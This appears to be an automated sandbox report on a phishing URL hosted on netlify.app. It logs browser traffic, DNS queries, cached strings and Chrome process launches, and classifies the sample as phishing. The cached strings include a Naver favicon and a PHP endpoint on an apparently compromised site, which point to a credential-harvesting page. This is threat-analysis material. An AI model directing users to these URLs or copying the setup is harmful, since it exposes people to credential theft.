b25yZXBvcnRpbmcsY2hkZXZpY2VtZW1vcnksbWljcm9waG9u
      Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?pac=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df76405d0af843ade72dd378ab52dcabb0b9f7f0e28290b624df49f9bd9760326f969229d87dbc7c1d84f17dcf0eb6f9ca41e67ca9056657bf391c54475e663d423c049b27bc24d85aa46afe36dbc8982d0845536baa229699f70a68dacb956c13d261c05887a030de4e14d85f112ca9987da1490c595390e2b55e17ef854b85fb29d7bc971107403287762e75a8e9d210afa3c82b5ff35c5dd14da2161a510603eceabc30059ed74f392028344484038e0647fd9f6893fd95d68cbd950f492&cri=S9cmgKYQSv&ts=1155&cb=1736642001047 HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=5ufhciitm2l3&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bs&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%23ffffff HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=lwf3qohhv0j&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bv&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.xay.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /themes/cleanPeppermintBlack_657d9013/img/arrows.png HTTP/1.1Host: d38psrni17bvxu.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /themes/cleanPeppermintBlack_657d9013/img/arrows.png HTTP/1.1Host: d38psrni17bvxu.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
      Source: global trafficHTTP traffic detected: GET /track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.xay.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
      Source: global trafficHTTP traffic detected: GET /privacy.html HTTP/1.1Host: www.xay.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.xay.io/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: heuristic-knuth-588d37.netlify.app
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: i.imgur.com
      Source: global trafficDNS traffic detected: DNS query: nid.naver.com
      Source: global trafficDNS traffic detected: DNS query: essentialhandymanservices.com
      Source: global trafficDNS traffic detected: DNS query: www.xay.io
      Source: global trafficDNS traffic detected: DNS query: www.dynadot.com
      Source: global trafficDNS traffic detected: DNS query: euob.netgreencolumn.com
      Source: global trafficDNS traffic detected: DNS query: d38psrni17bvxu.cloudfront.net
      Source: global trafficDNS traffic detected: DNS query: syndicatedsearch.goog
      Source: global trafficDNS traffic detected: DNS query: obseu.netgreencolumn.com
      Source: global trafficDNS traffic detected: DNS query: afs.googleusercontent.com
      Source: unknownHTTP traffic detected: POST /mon HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-aliveContent-Length: 2736sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: http://www.xay.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: chromecache_103.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
      Source: chromecache_103.2.drString found in binary or memory: https://essentialhandymanservices.com/wp/next.php
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=
      Source: chromecache_108.2.dr, chromecache_95.2.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_108.2.dr, chromecache_95.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_108.2.dr, chromecache_95.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_103.2.drString found in binary or memory: https://i.imgur.com/g1U1hqo.png);
      Source: chromecache_103.2.drString found in binary or memory: https://nid.naver.com/favicon_1024.png
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js
      Source: chromecache_103.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://syndicatedsearch.goog
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://www.googleadservices.com/pagead/aclk
      Source: chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion/16521530460/?gad_source=1&adview_type=3
      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55554 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55503
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55624
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55701
      Source: unknownNetwork traffic detected: HTTP traffic on port 55548 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55548
      Source: unknownNetwork traffic detected: HTTP traffic on port 55564 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55500
      Source: unknownNetwork traffic detected: HTTP traffic on port 55521 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55588
      Source: unknownNetwork traffic detected: HTTP traffic on port 55519 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55484 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55594
      Source: unknownNetwork traffic detected: HTTP traffic on port 55699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55538 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55511 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55624 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55534 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55517
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55519
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55510
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55554
      Source: unknownNetwork traffic detected: HTTP traffic on port 55503 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55511
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55483
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55484
      Source: unknownNetwork traffic detected: HTTP traffic on port 55594 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55491 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 55510 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 55495 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55487
      Source: unknownNetwork traffic detected: HTTP traffic on port 55523 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55564
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55521
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55523
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55495
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55530
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55491
      Source: unknownNetwork traffic detected: HTTP traffic on port 55588 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 55517 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 55532 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55498 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55615
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55498
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55532
      Source: unknownNetwork traffic detected: HTTP traffic on port 55540 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55522 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55534
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55540
      Source: unknownNetwork traffic detected: HTTP traffic on port 55487 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55483 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: classification engineClassification label: mal76.phis.win@18/60@59/23
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1900,i,12343564241610681806,8701581686100418049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://heuristic-knuth-588d37.netlify.app/?naps/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1900,i,12343564241610681806,8701581686100418049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
